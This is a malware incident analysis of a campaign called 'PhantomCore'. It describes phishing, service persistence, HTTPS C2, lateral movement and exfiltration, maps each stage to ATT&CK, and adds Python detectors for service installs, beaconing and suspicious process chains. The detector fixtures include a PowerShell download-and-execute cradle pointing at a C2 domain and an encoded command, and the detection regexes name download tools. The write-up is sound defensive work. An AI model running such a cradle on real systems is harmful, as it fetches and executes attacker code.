An In-Depth Analysis of a Multi-Stage Malware Attack: Uncovering the Intricacies of ‘PhantomCore’

Daniel Osei — SOC Lead & Malware Analyst

Key Takeaways

  • Initial access relied on social engineering: a phishing email carrying a macro-enabled document whose macro ran a PowerShell download command.
  • A custom downloader fetched the main payload, which then persisted as a Windows service so that it survived logoffs and reboots.
  • C2 traffic went over HTTPS to attacker-controlled domains, with a pinned certificate and jittered beacon timing to frustrate inspection and periodic-traffic detection.

Executive Summary

During our investigation into a recent incident involving a malware family we track as PhantomCore, we observed a precise, staged attack chain. The tooling combined initial access, persistence, lateral movement and exfiltration into a single operation rather than a loose collection of tools. The targeting appears to be enterprise environments, and the actor paired social engineering with exploitation of known vulnerabilities to gain a foothold on critical systems.

Initial Access

Initial access was gained through a carefully crafted phishing email carrying a malicious attachment. The document impersonated legitimate business correspondence and contained an embedded macro which, once the user enabled it, ran a PowerShell command. That command downloaded the first stage of PhantomCore, a small dropper whose only job was to stage the rest of the chain. In MITRE ATT&CK terms this is T1566 – Phishing, specifically the T1566.001 Spearphishing Attachment sub-technique.

Execution & Persistence

Once executed, the dropper downloaded the main payload from a remote server. That payload persisted through a mechanism we see regularly: it installed itself as a Windows service, creating a key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ so that the Service Control Manager starts it at boot. Because services start before any interactive logon and run regardless of which user is signed in, the implant survived logoffs and reboots. Once running, it began low-frequency beaconing to its command-and-control (C2) server. The correct ATT&CK mapping for service-based persistence is T1543.003 – Create or Modify System Process: Windows Service; T1547 – Boot or Logon Autostart Execution covers Run keys and similar autostart locations, not services.
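The persistence above leaves a record every time it is set up: a service installation event (System log Event ID 7045) or, with Sysmon, a registry write under the Services key. The following is an added example for this write-up, not code from the original report or from the malware: it triages constructed 7045-style records (the field names ServiceName, ImagePath, StartType and AccountName follow the real event; the services, paths and the PhantomCore service name are assumptions) and flags the properties that an implant-installed service tends to have.

```python
"""Triage of Windows service installs for persistence of the kind
PhantomCore used (a new key under HKLM\\SYSTEM\\CurrentControlSet\\Services).

Added example for this write-up; it is not code from the original report
or from the malware. The events below are constructed and use the field
names of System log Event ID 7045 ("A service was installed in the system").
"""

# Directories a service binary normally lives in (lower-case, trailing backslash).
SYSTEM_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# Locations an unprivileged user can write to: a service binary here is a red flag.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "c:\\programdata\\",
                 "c:\\users\\public\\", "\\downloads\\")
# Script and proxy-execution hosts that a legitimate service rarely wraps.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

SAMPLE_EVENTS = [  # constructed 7045 records; names and paths are assumptions
    {"ServiceName": "WinUpdateSvc", "ImagePath": r"C:\ProgramData\WinUpdate\wusvc.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "Sense",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"',
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Schedule", "ImagePath": r"%SystemRoot%\System32\svchost.exe -k netsvcs -p",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "SyncHelper",
     "ImagePath": r"C:\Windows\System32\cmd.exe /c C:\Users\Public\sync.bat",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "VendorAgent", "ImagePath": r"C:\Program Files\Vendor Tool\agent.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]


def normalize_image(image_path):
    """Return the executable from an ImagePath value, lower-cased, with
    quotes and arguments removed and %SystemRoot%/%windir% expanded."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        exe = p[1:end] if end != -1 else p[1:]
    else:
        # Unquoted: take everything up to the first ".exe"; arguments follow.
        cut = p.lower().find(".exe")
        exe = p[:cut + 4] if cut != -1 else p.split(" ")[0]
    return exe.lower().replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")


def triage_service_event(ev):
    """Return the reasons a service-install event deserves a look
    (an empty list means nothing stood out)."""
    reasons = []
    raw = ev["ImagePath"].strip()
    exe = normalize_image(raw)
    name = exe.rsplit("\\", 1)[-1]
    if any(w in exe for w in USER_WRITABLE):
        reasons.append("binary in user-writable location")
    elif not exe.startswith(SYSTEM_DIRS):
        reasons.append("binary outside system and program directories")
    elif any(w in raw.lower() for w in USER_WRITABLE):
        reasons.append("arguments reference a user-writable path")
    if name in SCRIPT_HOSTS:
        reasons.append(f"service wraps script host {name}")
    if not raw.startswith('"') and " " in exe:
        # SCM tries each space-delimited prefix, so this path is hijackable.
        reasons.append("unquoted service path containing spaces")
    return reasons


def triage_all(events):
    """Map each ServiceName to its list of reasons."""
    return {ev["ServiceName"]: triage_service_event(ev) for ev in events}


if __name__ == "__main__":
    for svc, reasons in triage_all(SAMPLE_EVENTS).items():
        print(f"{svc:14} {reasons or 'ok'}")
```

Run it as-is to see the constructed WinUpdateSvc and SyncHelper entries flagged while the svchost-hosted and quoted Program Files services pass. The same logic applies to Sysmon Event ID 13 records whose TargetObject ends in \ImagePath; only the field extraction differs. The checks are deliberately about where and how the binary runs rather than its name, because a service name like "WinUpdateSvc" is chosen precisely to look routine.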

Command and Control

The C2 infrastructure was built to blend in. PhantomCore communicates over HTTPS, so request and response contents are invisible to network inspection unless TLS is intercepted, and the implant pins its server certificate, so a decrypting proxy makes the connection fail rather than revealing the traffic. We identified several domains used for C2, including update-server[.]com and data-service[.]net, named to resemble routine update and data services. Network logs showed a consistent check-in pattern in which the interval between requests was randomised (jittered) around a base sleep, which defeats detection rules that look for fixed-period traffic. This is T1071.001 – Application Layer Protocol: Web Protocols.
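Jitter defeats a rule that looks for requests every N seconds, but it does not defeat statistics on the gaps between requests: an implant that sleeps 300 seconds plus or minus a few tens of seconds still produces gaps whose standard deviation is small relative to their mean, while human browsing produces gaps spread over orders of magnitude. The following is an added example for this write-up, not tooling from the original report: it runs that check over constructed proxy log lines (timestamp, client, destination host, status; the client address, the intranet and news hosts, and the timings are assumptions) and returns the client/destination pairs that look like beacons.

```python
"""Beacon detection over proxy logs: flag (client, host) pairs whose
connection timing looks like a jittered check-in.

Added example for this write-up; it is not PhantomCore code or the
original report's tooling. Log lines, hosts and timings are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines: "<ISO timestamp> <client_ip> <dest_host> <status>".
# The update-server.com entries simulate a ~5 minute beacon with jitter;
# the intranet.example and news.example entries are ordinary browsing.
SAMPLE_LOG = """\
2024-05-01T09:00:00 10.0.0.15 update-server.com 200
2024-05-01T09:00:20 10.0.0.15 intranet.example 200
2024-05-01T09:04:50 10.0.0.15 update-server.com 200
2024-05-01T09:10:10 10.0.0.15 update-server.com 200
2024-05-01T09:15:05 10.0.0.15 update-server.com 200
2024-05-01T09:19:40 10.0.0.15 update-server.com 200
2024-05-01T09:25:30 10.0.0.15 update-server.com 200
2024-05-01T09:30:05 10.0.0.15 update-server.com 200
2024-05-01T09:01:00 10.0.0.15 news.example 200
2024-05-01T09:01:02 10.0.0.15 news.example 200
2024-05-01T09:41:00 10.0.0.15 news.example 200
2024-05-01T11:00:00 10.0.0.15 news.example 200
"""


def parse_log(text):
    """Group connection timestamps by (client, host), sorted per pair so
    that input order does not matter."""
    by_pair = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, _status = line.split()
        by_pair[(client, host)].append(datetime.fromisoformat(ts))
    return {pair: sorted(stamps) for pair, stamps in by_pair.items()}


def beacon_score(timestamps):
    """Return (count, mean_gap_seconds, cv) for a sorted timestamp list.
    cv is the coefficient of variation (stdev / mean) of the gaps between
    consecutive connections; periodic traffic has a small cv even when the
    implant randomises each sleep around its base interval."""
    if len(timestamps) < 2:
        return len(timestamps), 0.0, float("inf")
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    m = mean(gaps)
    if m == 0:
        return len(timestamps), 0.0, float("inf")
    return len(timestamps), m, pstdev(gaps) / m


def find_beacons(text, min_connections=5, max_cv=0.3):
    """Return the (client, host) pairs that look like beacons with their
    scores. min_connections avoids scoring pairs with too few samples;
    max_cv is the tolerated relative spread of the gaps."""
    hits = {}
    for pair, stamps in parse_log(text).items():
        n, m, cv = beacon_score(stamps)
        if n >= min_connections and cv <= max_cv:
            hits[pair] = {"count": n, "mean_gap_s": round(m, 1), "cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for pair, score in find_beacons(SAMPLE_LOG).items():
        print(pair, score)
```

On the constructed log only the update-server.com pair scores as a beacon (seven connections, mean gap of about five minutes, cv under 0.1); the news.example visits have a cv near 0.8. Two caveats a practitioner would want: legitimate software (update checkers, telemetry agents) also beacons, so this is a triage signal to be joined with destination age, prevalence and category rather than an alert on its own; and the thresholds need tuning to the observation window, since a long-sleeping implant needs a longer window to reach min_connections.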

Lateral Movement & Discovery

After establishing persistence, the actor moved laterally. The payload used Windows Management Instrumentation (WMI) for remote command execution on other hosts, and we saw several attempts to harvest credentials with Mimikatz. PowerShell scripts (T1059.001 – Command and Scripting Interpreter: PowerShell, formerly tracked as T1086) were used to open RDP sessions to other machines with the harvested, elevated credentials. The malware also enumerated network shares, a step that identifies the file repositories worth targeting. T1210 – Exploitation of Remote Services was evident as well: the actor attempted to exploit known vulnerabilities in internally reachable services to reach additional hosts.

Impact & Objectives

PhantomCore's objectives appear to be twofold: exfiltration of data and reconnaissance in preparation for follow-on operations. We found sensitive data being collected, compressed and staged inside the network ready for transfer, and that data left through the C2 channels already identified, which points to intellectual property theft as the goal. In parallel, scripts queried internal directories for user and group information, making T1087 – Account Discovery a recurring activity as the actor built up an understanding of the environment to support further intrusion.

MITRE ATT&CK Mapping

  • T1566.001 – Phishing: Spearphishing Attachment: the initial payload arrived as a macro-enabled document, with social engineering to get the user to enable the macro.
  • T1059.001 – Command and Scripting Interpreter: PowerShell (formerly T1086): the macro's download command and the later lateral-movement scripts.
  • T1543.003 – Create or Modify System Process: Windows Service: persistence via a new service registered under HKLM\SYSTEM\CurrentControlSet\Services.
  • T1071.001 – Application Layer Protocol: Web Protocols: C2 over HTTPS with a pinned certificate and jittered beacons.
  • T1047 – Windows Management Instrumentation: remote command execution on other hosts.
  • T1003 – OS Credential Dumping: credential harvesting with Mimikatz.
  • T1021.001 – Remote Services: Remote Desktop Protocol: RDP sessions opened with the harvested credentials.
  • T1210 – Exploitation of Remote Services: attempts to exploit known vulnerabilities in internal services to reach further hosts.
  • T1135 – Network Share Discovery: enumeration of shares to locate data repositories.
  • T1087 – Account Discovery: directory queries for accounts and groups.
  • T1560 – Archive Collected Data: compression and staging of collected data before transfer.
  • T1041 – Exfiltration Over C2 Channel: staged data sent out through the existing HTTPS C2 connection.

Detection Opportunities

  • Process creation: alert when an Office application (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE) spawns powershell.exe, cmd.exe or another script host, and when any PowerShell command line carries a download cradle (DownloadString, Invoke-WebRequest, Net.WebClient) or an encoded command. Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled, supplies the parent, child and command-line fields.
  • Service persistence: alert on new service installation (System log Event ID 7045, Security Event 4697, or Sysmon Event ID 13 for writes under HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath), and review any service whose binary lives in ProgramData, AppData, Temp or another user-writable directory, or whose ImagePath wraps cmd.exe or powershell.exe.
  • Lateral movement: WmiPrvSE.exe spawning cmd.exe or powershell.exe is the host-side signature of remote WMI execution. Pair it with RDP logons (Security Event 4624, logon type 10) from workstations that do not normally initiate RDP, and with handles opened on lsass.exe (Sysmon Event ID 10), which is how Mimikatz-style credential harvesting shows up.
  • Network: HTTPS with certificate pinning means a decrypting proxy will not expose the content and will simply break the implant's connection, so work from metadata. Baseline outbound HTTPS per client and destination, review newly seen or low-prevalence domains, and look for jittered beaconing: randomised sleeps still leave a spread of inter-request gaps that is small relative to their mean.
  • Exfiltration: watch for archive creation on file servers or workstations followed by outbound transfers to the same C2 destinations, which is the staging pattern observed here.
  • Deception: decoy documents and honeypot accounts or shares give early, high-fidelity signal for the phishing, share enumeration and account discovery stages.
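The first and third detection points above, and the Office-to-PowerShell chain from the Initial Access section and the WMI execution from the Lateral Movement section, come down to the same question asked of process-creation telemetry: is this parent/child pair normal, and does the command line carry an indicator? The following is an added example for this write-up, not code from the original report or the malware: it scores constructed Sysmon Event ID 1-style records (the ParentImage, Image and CommandLine field names are the real ones; the paths, the command lines and the staging URL are assumptions) so that a chain anomaly combined with a command-line indicator outranks either alone.

```python
"""Suspicious parent/child process chains from process-creation telemetry
(Sysmon Event ID 1, or Security Event 4688 with command-line auditing).

Added example for this write-up, not code from the report or the malware.
The events are constructed. It covers the two chains described on this
page: an Office document spawning PowerShell with a download cradle
(initial access) and WmiPrvSE.exe spawning a shell (remote WMI execution).
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe"}
WMI_HOST = "wmiprvse.exe"

# Download cradles commonly seen in one-liners; extend from your own telemetry.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|net\.webclient|start-bitstransfer|bitsadmin", re.I)
# -EncodedCommand and its common abbreviations. PowerShell accepts any
# unambiguous prefix, so a production rule should list more of them.
ENCODED_CMD = re.compile(r"\s-e(c|nc|ncodedcommand)?\b", re.I)

SAMPLE_EVENTS = [  # constructed records; paths, command lines and URL are assumptions
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://update-server.com/stage1')\""},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_process_event(ev):
    """Return (severity, reasons). severity 0 = nothing noted, 1 = a single
    indicator, 2 = an anomalous parent/child pair combined with a
    suspicious command line."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    chain, cmdline = [], []
    if parent in OFFICE_APPS and child in SHELLS:
        chain.append(f"Office process {parent} spawned {child}")
    if parent == WMI_HOST and child in SHELLS:
        chain.append(f"WMI provider host spawned {child} (remote WMI execution)")
    if child in SHELLS and DOWNLOAD_CRADLE.search(cmd):
        cmdline.append("download cradle in command line")
    if child in ("powershell.exe", "pwsh.exe") and ENCODED_CMD.search(cmd):
        cmdline.append("encoded PowerShell command")
    reasons = chain + cmdline
    severity = 2 if chain and cmdline else (1 if reasons else 0)
    return severity, reasons


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        severity, reasons = assess_process_event(ev)
        print(severity, basename(ev["ParentImage"]), "->", basename(ev["Image"]), reasons)
```

The fourth constructed event (WmiPrvSE.exe running a plain Get-Service) scores 1 rather than 2 on purpose: management tooling does execute PowerShell through WMI, so the chain alone is a lead to review, while the same chain with an encoded or downloading command line is something to act on. Encoded command lines should be decoded (UTF-16LE base64) before the cradle check in a production rule; this example keeps the two checks separate to show each indicator on its own.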

Analyst Notes

PhantomCore is a reminder that the whole chain started with a macro a user was persuaded to enable, so email filtering, macro-blocking policy and user awareness remain the cheapest controls against this initial access vector. Beyond prevention, organisations need telemetry rich enough to answer the questions listed above (command lines, service installs, process lineage, outbound connection metadata) and a threat hunting practice that looks for lateral movement proactively, because the window between the first foothold and staged exfiltration is where this intrusion could have been contained.
